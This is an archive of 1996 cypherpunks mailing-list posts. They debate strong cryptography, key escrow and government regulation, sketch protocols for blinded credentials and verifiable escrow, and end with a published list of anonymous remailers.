If filtering is to be done, it's CyberPromo's responsibility to filter
their outgoing traffic.  I sent 3 warnings to the designated address
(wallace@cyberpromo.com) and provided a simple list of 2 domains to
block.  Now I'm sending invoices.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmGV3xvikii9febJAQFeAwP9EXI7ti2IBoSfQzswKmzy5roP+FiDOE06
e9W/mcLUUUt3Ul0mxC2cGdVrbUwhP2qdm6JKJsgOvskadHZspjOszzybeFOzw+6M
gIuRA01n6qS/lbKfBwdbdCRiqV6wpV+FFyIbpw6+jwsmB09RW1L+07K/6hiaKnYS
ZMMD1dKDVwA=
=dkOu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 13 Oct 1996 11:50:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: None
Message-ID: <199610131850.UAA04763@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>      The NOTS materials were just posted again to a.r.s. via
> huge.cajones.com

Thanks for telling me where to find the NOTs; I always wanted to read
about how to rid myself of body thetans.  Now I have been enlightened
by Hubbard's words and you are guilty of contributory copyright
infringement.  (The SPA told me so :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Oct 1996 18:37:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CAG_eng (Crypto AG)
Message-ID: <1.5.4.16.19961014013625.09ffae3a@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous has provided an English translation of the recent article on
Crypto AG and NSA in Der Spiegel.


http://jya.com/cryptoa2.htm  (English)


http://jya.com/cryptoag.htm  (German)


CAG_eng

---------

Recall that The Baltimore Sun published a similar report at the end of 1995,
as first noted here by Peter Wayner, I believe.


See the c'punk archives for more on The Sun article (try Altavista for
"Crypto AG").





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Sun, 13 Oct 1996 19:41:58 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: RE: Binding cryptography - a fraud-detectible alternative  to
In-Reply-To: <199610131846.LAA20382@mail.pacifier.com>
Message-ID: <Pine.BSI.3.95.961013190316.4170A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 13 Oct 1996, jim bell wrote:

> At 11:48 AM 10/13/96 +0000, everheul@mail.rijnhaave.nl wrote:
> >To  explain the backround of "binding cryptography" once more; with
> >respect to (interoperable, worldwide) security in the information
> >society socities/governments have to achieve two tasks: 1. 
> >stimulating the establishment of a security structure that protects
> >their citizens, but which does not aid criminals.
> 
That is pure unadulterated B.S.  That is only a flimsy, ruthless pretext,
without any foundation whatsoever, to usurp human freedom itself.
The use of such "Chicken Little tactics - the sky is falling," is an
unvarnished absurdity. The sky is not falling, in the U.S. and a few 
other places, people are trying to protect their own unbridled oligarchies
and elsewhere, where such irrational tactics are being used, it is
only being used to disguise the real motive of maliciously
seeking to subject others to their will and power. 

Is it not absolutely, absurdly  dichotomous,  to say the very, very 
least, that China, Burma, North Korea, North Viet Nam, Iran, Iraq, 
Cuba, Germany, the Mossad, the FBI, the NSA, the CIA, the DIA, and various
others, who are otherwise mutually exclusive groups are completely
in accordance, in this joint effort to oppose strong cryptography? There
has to be something wrong, terribly wrong somewhere, and there is! Has any
of the latter group given thought that if so many of their adversaries are
in agreement with them on this issue, then there may be some compelling
reasons to  provide others with the privacy of communication tools that
will enhance,.aide and abet those who are seeking precious freedom around
the world?

If we prohibit strong, unbreakable, cryptography, we are depriving
a great number of our fellow human beings seeking such freedom from
tyranny, of an valuable tool that they can use in the pursuit of that
noble cause. Is that not far more important and far more precious to all
who cherish freedom, than some irrational fear of how criminals and
terrorists might use cryptography for malevolent activities? 

Who are we going to support? Those few who might use cryptography to break
the law along with those who seek to usurp liberty and freedom - or all of
the millions of law abiding citizens around the world along with those who
seek to free themselves from the chains of despotism. We cannot have it
both ways. It must be one or the other, and the choice is clear! 

If we allow the terrorists and criminals to control our future course,
then we all will become victims of those terrorists and criminals.
We have very little to lose, if anything, and a great deal to gain. The
balance scale is not even close!  
. 
> I think this is a phony distinction.   Practically every product sold today 
> could arguably "aid criminals."  It isn't possible to prevent this.  And 
> that's the problem with your thinking above:  If government argued that it 
> had the authority to regulate any product that, arguably, "aided criminals," 
> then it would automatically be able to regulate anything.
> 

Obviously, though I strongly object to Jim's espousing of anarchy
in achieving certain ends, in this limited instance I believe Jim is
absolutely right. If you are pregnant, you are pregnant; there is no such
thing as partial pregnancy or partial freedom  and security. Under such
arcane principles, we would all be at the absolute mercy of purely
arbitrary government regulations. 

The underlying reason that governments, or governmental agencies,  advance
the theory that using strong, and yes even unbreakable, encryption aids
criminals and terrorists is to perpetuate their oligarchical powers, be it
in Burma or here in the United States. Fortunately, in the United
States, at least the perpetrators rationalize that they are doing what is
right for all of us; nevertheless, they are using their "Chicken Little -
the sky is falling," tactics to protect their own personal empires too,
either consciously or subconsciously.. 

The sky is not falling, far from it, careful reflection reveals that those
who oppose strong, or unbreakable, encryption,  are always talking about
some vague potential threat  as opposed to real threats. Criminals and
terrorists will always find the ways and means to carry out their
nefarious activities, with or without strong cryptography, it might
take a little more time, but they will find the way to do it. On the other
hand, all of the other millions of us, 99.99%+ of the users,  who seek
only to advance ourselves and the interests that they rightfully serve
can never achieve our objectives without strong, unbreakable, encryption
technology. , nit to mention all of those who can use it for good and
noble cause which advance human freedom.

Would we ever consider outlawing automobiles because they kill tens of
thousands of people around the globe each year. Automobiles, drugs,
cigarettes, alcohol and other causal agents kill far more people 
and are far more dangerous, by several orders of magnitude, than
strong encryption technology.   

The benefits of encryption security and privacy far outweigh any
deleterious problems associated with criminals and terrorists. It is not
even remotely close.  

An information society must encompass the capability to have absolute
privacy and security if it is to achieve its promise to make us a better
world. One of those promises is that it will eventually free all humans
from the power of despotic oppressors. We must struggle but 'We will
overcome.' Freedom denied, except where PROPERLY tempered by the harm it
might cause to others, is tyranny; and preventing us from using
unbreakable cryptographical systems is an obvious denial of free speech
and every other freedom that humans hold dear.

TVM,

Don Wood
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sun, 13 Oct 1996 22:34:50 -0700 (PDT)
To: hal@rain.org
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <199610140530.WAA17735@crypt>
MIME-Version: 1.0
Content-Type: text/plain


The "blinded identities" problem is one of the oldest that we have
discussed here (although not much recently, of course!).  It is basically
similar to what cryptographers call "blinded credentials" and is closely
related to electronic cash, as Michael Froomkin's example from Stefan
Brands points out.  I posted an idea a few years ago for how to use the
technique to solve the related problem of remailer abuse.

A simple way to approximate what you want is to use a standard blinded
signature exactly as is done with David Chaum's DigiCash.  The customer
comes to you and presents some proof of identity.  This may be in
person via standard paper documents, or on-line via some cryptographic
credential as you suggested.  You make a list of all of your customers,
and make sure that this customer is new, someone you haven't seen before.

Now you simply give him a blinded cryptographic signature, of exactly the
same form as the blinded coins given out by DigiCash.  He unblinds it,
and he is left with a signed credential from you, but one which is
unlinkable to his identity.

When he interacts with you, he displays this credential as proof
that he is a customer in good standing.  If he violates the terms of
your contract, you disable the credential (add it to a list of bad
credentials).  He can't use this one any more, and he can't get a new
one because he is on the list of people who already got their credential.

This simple solution suffers from several problems, some of which are
endemic to this class of solutions and others which can be addressed
with fancier crypto.  Among the fundamental problems we have first that
verifying identity reliably is difficult to impossible.  If people are
motivated badly enough, they can forge whatever documents they need.
Then they keep signing up with new identities like the kids who use
AOL throwaway accounts.

Second, if the customer ever loses his credential, he is screwed.
He comes to you with some sob story about how his disk crashed and his
dog ate his backups, but you have no way of knowing if he actually lost
his credential, or if he is an abuser who got his credential cancelled.
Another problem is that groups of users can share credentials, so that
some hacker club can get a bunch, one for each of them, and then they
can all abuse your ISP, getting credentials cancelled, but able to keep
going as long as one is left.

Problems which can be fixed include that credentials could be stolen,
like phone card numbers, so an innocent person gets his credential
cancelled and then we are back to the second problem above.  You can
mostly solve this by having him create a key when he first registers
with his credential and require all his interactions to be protected by
this key.  There are also more elaborate solutions where he wouldn't
actually send his credential over, but use zero knowledge techniques
to prove that he had one.

Unfortunately David Chaum has a pretty good set of patents covering
blind signatures, so for a commercial venture you'd probably have to look
into the legal situation.  I can send you a list of Chaum's patents in
the area if you want it.  (I had it on my web page but my ISP quit so
I need to get a new page going.)

Some of the other practical issues are also mentioned in Michael
Froomkin's article, like waiting a while after you get your credential
before you use it.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 13 Oct 1996 23:47:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <199610140646.XAA03949@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> >Steve Shear <azur@netcom.com> writes:
>> I've been charged with developing an Internet service which needs to assure
>> its clients of anonymity.  However, we fear some clients may abuse the
>> service and we wish to prevent the abusers from re-enrollment if
>> terminated for misbehavior. 

At 04:28 PM 10/13/96 -0400, "Michael Froomkin - U.Miami School of Law"
<froomkin@law.miami.edu> wrote:
>Stefan Brands has a protocol that probably does what you want.  
....
>http://www.law.miami.edu/~froomkin/articles/oceanno.htm#ENDNOTE286

Looks like a really nice paper on anonymity issues; at 485K, it'll take
a little while to read :-)

The fundamental difficulty in this problem is that you need some 
demonstrable proof of uniqueness for human users; if you don't have that,
you can't transform it into a unique-but-anonymous identity.*
The issues are similar to privacy-protecting voter registration problems.

Brands's protocol starts with the user going to the bank with proof of ID,
and getting a numerical ID which can be blinded and signed.
It's a nice approach; you can do cruder approaches by hashing your
universal-citizen-unit-ID-number or whatever, but that can be
dictionary-searched
by feeding all the possible ID numbers through the hash.

For some applications, mapping back to a unique human isn't necessary;
if you do something like map back to a bank account which has a high
minimum balance for setup, this discourages the type of users who
don't want to spend $100 just to send spam.

Blinding a Verisign signature isn't enough, though - they support
personna certificates without proof of identity.

Froomkin also points out a class of attacks that can allow abusers to get around
Brands's protocol - a group of users get together and abuse one ID till it gets
busted, then abuse the next, etc., until they're all burned.  Or you hire
a bum off the street to get an account for you.  Or whatever.

[ * There are non-universal-identifier methods for preventing double-use.
Voter registration in many places just depends on identification and
affidavit, and is often abused (e.g. Chicago graveyard voters and
Nevada absentee ballots), but usually not massively abused.
Some third-world countries don't even require registration or literacy - 
they dip your thumb in ink after you vote, using a kind of ink that
won't come off for a couple of days.  Attacks against this protocol
include better solvents :-) ]


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 13 Oct 1996 23:38:36 -0700 (PDT)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Swan song...
In-Reply-To: <199610102226.PAA26543@fat.doobie.com>
Message-ID: <199610140552.AAA00402@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


>  dthorn@gte.net wrote to All:
>  d> Perry E. Metzger wrote:
>  >> Well, folks, after four or five years here, I'm finally leaving.
>  d> I haven't been on the list more than 6-8 weeks...
> You might be expected to defer to those of us who have been here for
> years and have seen the list go terribly downhill.
>  d>  ...but in that time, it's
>  d>  been more interesting than I would have guessed for a non-technical
>  d>  forum, which isn't necessarily good...
> It's especially not "nesessarily good" when the list was _supposed_ to
> be a technical forum concerning cryptography and privacy technology,
> along with the few posts concerning pending legislation and the social
> effects of such tech.
> Now, the average day's traffic is about two-thirds pure noise.  What on
> earth is interesting about _that_?

     With the execption of those twits flaming Mr. May, there is noise,
and there is NOISE. The noise here is more valuable, insightful, and thoughtful
than the signal most places.

     I joined this list primarily to lurk, as I had been told that it was 
primarily techincal in nature, and I don't have much to add at that level. I
was pleasantly suprised to learn that the content was much more than just 
technical. There are many of us who _can't_ code, but "we" can think about 
the protocalls at a different level, and we MUST understand the implications
of the technology that "we" are assisting to deploy. "We" must understand what 
"we" are unleashing, to do less is irresponcible. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 14 Oct 1996 00:55:59 -0700 (PDT)
To: cypher@cyberstation.net
Subject: A "RIGHT" to strong crypto?  [Was: RE: Binding cryptography - a fraud-detectible alternative  to
In-Reply-To: <Pine.BSI.3.95.961013190316.4170A-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.94.961014020541.28315F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Oct 1996 cypher@cyberstation.net wrote:

> > At 11:48 AM 10/13/96 +0000, everheul@mail.rijnhaave.nl wrote:
> > >To  explain the backround of "binding cryptography" once more; with
> > >respect to (interoperable, worldwide) security in the information
> > >society socities/governments have to achieve two tasks: 1. 
> > >stimulating the establishment of a security structure that protects
> > >their citizens, but which does not aid criminals.
> > 
> That is pure unadulterated B.S.  That is only a flimsy, ruthless pretext,
> without any foundation whatsoever, to usurp human freedom itself.
> The use of such "Chicken Little tactics - the sky is falling," is an
> unvarnished absurdity. The sky is not falling, in the U.S. and a few 
> other places, people are trying to protect their own unbridled oligarchies
> and elsewhere, where such irrational tactics are being used, it is
> only being used to disguise the real motive of maliciously
> seeking to subject others to their will and power. 

[...]

> If we prohibit strong, unbreakable, cryptography, we are depriving
> a great number of our fellow human beings seeking such freedom from
> tyranny, of an valuable tool that they can use in the pursuit of that
> noble cause. Is that not far more important and far more precious to all
> who cherish freedom, than some irrational fear of how criminals and
> terrorists might use cryptography for malevolent activities? 

[...]

> An information society must encompass the capability to have absolute
> privacy and security if it is to achieve its promise to make us a better
> world. One of those promises is that it will eventually free all humans
> from the power of despotic oppressors. We must struggle but 'We will
> overcome.' Freedom denied, except where PROPERLY tempered by the harm it
> might cause to others, is tyranny; and preventing us from using
> unbreakable cryptographical systems is an obvious denial of free speech
> and every other freedom that humans hold dear.

Remember who it is that you must deal with.  You must deal with
government.  Like it or not, government is the medium here.

Effectively there are three options.

1>  Convince government.
2>  Avoid governmnet.
3>  Overthrow governmnet.

Convince Government:  It is my opinion as a Washington resident, attorney
and beltway fever observer that this is impossible in any meaningful way.
I don't care how many industry people gripe, how many letters go into
senators, how many whimpers there are.  If the Director of the FBI, key
people at Justice, the Director of CIA and the Director of NSA tell the
President that their ability to enforce the law, conduct intelligence
operations and prosecute high profile cases is going to be severely
hampered by strong crypto, you can bet that something is going to get
done.  Crypto is on the radar folks.  So are anonymous remailers (and not
just the penet kind) and so are secure communications in general.  The
government, particularly the executive branch, is a lot more savvy on this
issue than even this list has given them credit for.  They have a 13th
Generation component (Michael Vatis is a great example) who are listened
to by craft superiors (Gorelick), know the issues, know the risks, and
know the weak points. Be very afraid.

Changing their mind is out of the question in my view, and efforts are
better directed elsewhere.

It would be a bit easier if crypto savvy types like our two .nl friends
(of "Binding Cryptography" fame) wouldn't provide them with gelding
instruments, but this is to be expected.

At this point, some original type will suggest that the people (a minority
to be sure as the number of people who know much about the net much less
crypto, while increasing, is unlikely to be very effectual) should just
start whacking officials who aren't crypto friendly.  Let's take it to
option #3 then and address this.

Overthrow Government:

Any student of international relations and/or internal low intensity
conflict will realize that there must be a measure of public support to
back any kind of organized revolt with political ends as its goal.

Terrorism hardly seems a prudent option.  Certainly a net terrorist today
could use his skill and expertise in causing a great deal more havoc with
a great deal less funding and general resource than a terrorist of yore,
but what irony.  Destroying the net to save it?  Bombing power centers to
make the internet free for all man?  Moreover, without larger scale
organization one never reaches the level of "low intensity conflict"
but rather remains at the level of "random terrorism."  The
effectiveness of random terrorism is, I think, historically quite well 
defined.  Essentially it is ineffectual alone.

To bring about the level of organization required to raise the stakes to
"low intensity conflict" or "organizaed revolt" some cadre of supporters
and popular sympathy is required.  Not likely in this case.

It's hard enough to conduct an effective low intensity campaign
with a easily understood mantra (like political system, religious freedom,
fundamentalism, etc.) but to conduct one with the goal of overturning
crypto regulations...?  I understand that many people on this list view
the crypto debate as an essentially free speech issue.  I tend to agree
with this view, but in terms of strict free speech nexi, I am in the
minority and even my agreement is tempered with the realization that such
an expansive reading of free speech is fringe at best.  The question
becomes not what is the right intrepretation of the crypto issue, but how
strongly public sentiment can be identified with the crypto issue itself.
This is a minimal, almost vanishingly small influence outside of this
list.

So we are left with random terrorism in the name of free strong crypto.
Perhaps a few high profile incidents might come off without a hitch by
groups who have it together or have some more impressive leadership or
exotic background, but individual efforts are unlikely to accomplish a
great deal.

Between a few small group efforts and perhaps a single or two successful
individual efforts to make headline news in a few years times we have then
perhaps 5 incidents, two of which might be really scary if they involve
bombings or some such.  This would require at the very least 10-15
active participants, or in the most extreme case 7-10.  Given the past
preformance of the FBI I'd suspect that half or more of the efforts would
result in arrests.

As far as I can tell there are perhaps two or three members on this list
who would come anywhere close to doing actual terrorist acts to further
strong crypto at the moment.  Even by this quite generous estimate I think
its clear that in the next 3 years the liklihood of a government overthrow
or even a marginally successful terrorist campaign is vanishingly small.
Organized low intensity conflict is out of the question in this time
frame.

2: Avoid the Government

I am convinced this is the only answer.  It has essentially always been
the cypherpunk answer.  "Cypherpunks write code."  Cypherpunks get it
done.  etc.  Get the genie out of the bottle and keep it there.  This is
PGP, this is ssh, this is SSL, this is mixmaster, this is remailers.  Get
it out, get it working, get there first.

Ok.  We got some of it there.  Now what?  The lead time on crypto is about
up.  In my estimate regulation will be in place by 1998, if not earlier.
Remember that in many countries regulation already exists.

Efforts put on resisting or moderating crypto are fine.  Political action
is fine.  Even so I submit that technological action is more important at
this stage.  The delaying games are about over.

Where is highly sophisticated stego?
Where are larger keys for symetric ciphers?
Where is a fully functional and secure "stealth PGP"?
Where are anonymous and encrypted WWW clients and hosts which permit
chaining?

If the crypto war is going to be lost it will be lost in the chill of
development when crypto regulation is put into place.

If you don't make the guns in the first place, the government has a much
easier time taking them away.

It is going to take a constitutional amendment or a very very favorable
Supreme Court ruling to keep strong crypto legal.

There is no "right to crypto," as much as Mr. Wood would like to believe
it exists.  Sorry Mr. Wood.  It isn't going to be as easy as all that.

> TVM,
> 
> Don Wood

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 14 Oct 1996 01:03:14 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610132214.PAA27575@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961014035114.28315K-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Oct 1996, jim bell wrote:

> At 04:28 PM 10/13/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
> >It is unpublished, but he kindly allowed to me describe it in a paper I
> >wrote that discussed whether a bank would ever want to take the risk of
> >allowing bank accounts where it did not know the identity of the customer.

> And I don't think that a bank can ever be embarrassed (assuming bank 
> accounts are anonymous) by it being revealed that some particular bad guy 
> kept his money there, any more than other cash-based (anonymous) businesses 
> are embarrassed if it is revealed that some bad guy used their services.

I would refer you to Union Bank of Switzerland in the late 80's
(kidnapping), BCCI (drug and intelligence money), BMI (drug
money/offshore insurance fraud), PNC Bank (accounting fraud), and a host
of others I won't bother to list.  Banks do suffer from these disclosures,
in many cases quite severely.  (PNC bank was nearly ruined by their fraud
harboring disclosures).  Why exactly is it that you think frauds,
seizures, compelled customer referrals and the like go unreported to the
authorities in something like 75% of the cases?  Why exactly is it that
you think banks seek to open offshore branches with autonomy and distance
from the home branches?  Answer: Banking is as much about confidence as
any business can be.  Anonymous or not, the presence of funds which
infringe on regulations in one area or another are frightening to normal
banking customers.

I know it's a lot to ask, but please stick to areas you know please,
rather than making up facts to support your arguments.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 14 Oct 1996 01:24:36 -0700 (PDT)
To: everheul@mail.rijnhaave.nl
Subject: Re: Binding cryptography - a fraud-detectible alternative to
In-Reply-To: <199610131050.LAA28296@mail.rijnhaave.nl>
Message-ID: <199610140540.GAA00133@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Eric Verheul <everheul@rijnhaave.nl> writes:
> To  explain the backround of "binding cryptography" once more; with
> respect to (interoperable, worldwide) security in the information
> society socities/governments have to achieve two tasks: 1. 
> stimulating the establishment of a security structure that protects
> their citizens, but which does not aid criminals. 

I think market forces should cope with this just fine, without
governments.  The government `stimulation' imposed by the US
government on clipper/encryption export has cost the US software
industry billions of $ in lost trade, and the US tax payer many more
millions paying for the failed secret NSA development of clipper I.

I don't see anyone calling for the `government stimulation', quite the
opposite; the US software industry is calling for removal of export
controls.  The US software industry has been extremely uncooperative
with Clipper I, II & III.  The US public out right rejected clipper I.
Then Clinton passed it as a government standard by presidential decree
anyway.  The USG achieved some small appearance of cooperation from a
few companies they black-mailed and bribed into signing on for clipper
IV.

The USG managed to persuade the OECD to discuss key escrow, and now we
see that the USG says that it must pursue key escrow because of the
pressure from the OECD.  This is simply manipulation, and deception.

> We believe that "binding cryptography" is flexible enough to achieve
> this: a liberal crypto policy might use no Trusted Retrieval Parties
> at all, while a very non-liberal country might want one (government
> controlled) TRP, a compliance check on all network traffic and a ban
> on other crypto.

I agree, binding cryptography is an important new technology for
implementing conditional third party access to keys.  Have you applied
for patents?

> With binding cryptography the issue on a crypto policy becomes
> non-technical and politically debatable: which features does a
> country want and what implementation?

Cypherpunks vote is for none.  We vote that the civilized countries
set a good example to China and Singapore etc, by having no key
escrow, TTPs, TRPs etc.

> The concept behind the third-party checking is that no "law-abiding"
> citizen should have any problem that abuse - and only that - of a
> *voluntary* system can be "seen" by many parties. 

If its voluntary then "abuse" is not abuse, it is just not opting to
use the voluntary system.  Where is the problem?

The problem is that you appear to want to make those who do
voluntarily use the escrow systems non-interoperable with those who
don't.  (The USG wants this also, they can coerce big business into
offering escrow software only).

> If and *how* checking is done, is a matter of each society. The same
> concept holds for many things in life and is well accepted. For
> instance that is why cars have registration plates: if a car drives
> through after an accident on a *public* road, then by-standers
> (third parties) can observe that. I for one don't the information
> society to be the wild west, where anything goes.

I do.  I want the information society to be free.  I want free speech.
I can not do a hit and run with words.

If some group of prudish people do not want to hear free speech, they
can hide in enclaves, pay for a censored USENET feed, etc.

> Adam Back[SMTP:aba@dcs.ex.ac.uk] wrote:
> > As your paper describes, your system allows anyone to check the
> > correctness of the escrowed session key.  Have you considered
> > modifying it so that the only person who can check is the owner of a
> > designated private key of a public/private key pair?  This would
> > allow say for the TTP to check correctness, and not the TRP, nor the
> > public. I'm not sure of the usefulness of this, but it allows you to
> > select from the full spectrum according to requirements:
> >
> > a) no one can check, PGP second recipient (Carl Ellison, Bill
> > Stewart) 
> >
> > b) recipient only can check (my suggestion) 
> > 
> > c) holder(s) of designated keys can check 
> > 
> > d) anyone can check (your proposal)
> >
> > c) should be easy to acheive: restrict d) by having the sender
> > encrypt the escrowed session key a second time to this public key.
> 
> Point a) can be circumvented too easily.

If the system is voluntary, circumventing it is opting not to make use
of the voluntary key escrow.  This is by definition not a crime.

> How do you envision point b? Sending all keys (or a selection) to
> the recipient for checking is: impractical & dangerous (you want the
> distance between the actual communication and the guy that can
> decypher as large as possible). 

I don't undestand your point.  You give away less by letting the
recipient check than you do by letting the government (point c), or
anyone (point d) check.

This is how I envisioned it working, RSA and IDEA encryption:

parties:

Alice:  Alices public key = PK_a, Alice's secret key = SK_a
Bob:    PK_b, SK_b
Government:    PK_g, SK_g

Alice is sending Bob the message M. 

E_b = RSA_encrypt( PK_b, left-pad_b || session-key || right-pad_b )
E_g = RSA_encrypt( PK_g, left-pad_g || session-key || right-pad_g )
encrypted-data = IDEA_encrypt( session-key, left-pad_g || right-pad_g || M )

Alice sends Bob:

C = E_b || E_g || encrypted-data

Bob can decrypt.  He can check that the government can decrypt by
repeating:

E_g = RSA_encrypt( PK_g, left-pad_g || session-key || right-pad_g )

If Alice replaces the session key in E_g with garbage, then the data
is not GAKed.  Bob will be able to detect this.  The government will
not (at least not without trying to decrypt).

> If you don't send keys, then abuse will only show up during a
> warrant.  But that abuse will show up anyway.. So what is the use?

It's voluntary, if it turns out that you did not use key escrow during
a warant, then the keys weren't escrowed.  This is what you get with a
voluntary system, people don't have to use it.

If you choose to allow the person who you are corresponding with to
verify that you are escrowing your keys, that is your business.

If you choose to allow the government also to check (option c, or d)
then that also is your business.  The whole system is voluntary.  I
don't see how you can arrange it any other way, and still claim that
it is a `voluntary' system.

> Point c is a nice suggestion. Although I for one have no problem
> that anyone can see that I comply with the rules (..unless of course
> it is a non-voluntary system etc..).

The TTP might want to be the only checker.  With c), the TRP itself can not
check compliance.  The TRP has no information until the TTP decrypts, and
hands it the key for recovery.  This means the TTP does not have to trust
the TRP not to decrypt packets, without cooperation from the TTP.

user calculates:

E_trp = ElGamal_encrypt( PK_trp, session-key )

and sends:

E_ttp = ElGamal_encrypt( PK_ttp, random-pad || E_trp )
E_user = ElGamal_encrypt( PK_user, session-key )

(random-pad to avoid any further binding checks)

now TTP can check, by decrypting E_ttp to get E_trp, and using the
normal binding check that E_trp and E_user are encryptions of the same
session key.  The TTP sends TRP E_trp, and TRP can decrypts it, if the
request satisfies it's policies.

If the TTP further wishes that the TRP does not see the session key,
even when the TTP has cooperated with the TRP to get the key, you
could arrange key splitting:

user calculates:

session-key = session-A XOR session-B
E_trpa = ElGamal_encrypt( PK_trp, session-A )

user sends:

E_ttpa = ElGamal_encrypt( PK_ttp, random-pad || E_trpa )
E_ttpb = ElGamal_encrypt( PK_ttp, session-B )
E_usera = ElGamal_encrypt( PK_user, session-A )
E_userb = ElGamal_encrypt( PK_user, session-B )

recipient calculates:

session-A = ElGamal_decrypt( SK_usera, E_usera) 
session-B = ElGamal_decrypt( SK_userb, E_userb) 
session-key = session-A XOR session-B

TTP checks:

check = bind( E_usera, E_trpa ) AND bind( E_ttpb, E_userb )
session-A = ElGamal_decrypt( SK_ttp, E_ttpb) 

TRP at TTP's request:

session-B = ElGamal_decrypt( SK_trp, Etrp )

Then TTP calculates:

session-key = session-A XOR session-B

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 14 Oct 1996 06:52:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199610141350.GAA08848@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
